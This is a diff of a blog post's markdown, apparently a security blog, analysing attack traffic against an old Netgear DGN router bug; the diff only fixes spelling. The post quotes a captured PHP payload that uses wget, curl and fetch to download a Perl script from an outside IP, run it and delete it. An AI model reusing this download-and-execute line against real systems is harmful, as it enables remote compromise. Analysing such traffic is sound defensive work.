runningstream/blog.runningstream.net/content/post/old-netgear-dgn-bug.md

 <? system("cd /tmp ; wget -c -q  hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr ; curl -O  hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr; fetch  hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr "); ?>
 ```

-If someone had PHP installed or linked in cgi-bin, and a webserver configured to permit it to execute, this would have downloaded and executed a perl script, then erased its tracks.
+If someone had PHP installed or linked in cgi-bin, and a web server configured to permit it to execute, this would have downloaded and executed a Perl script, then erased its tracks.
 The requesting URL was 139.219.100.104.
 Both that and the download URL are on cloud service providers in China - TencentCloud and Microsoft (Microsoft's operated by "21Vianet").

 Again, that download server isn't reachable at this point.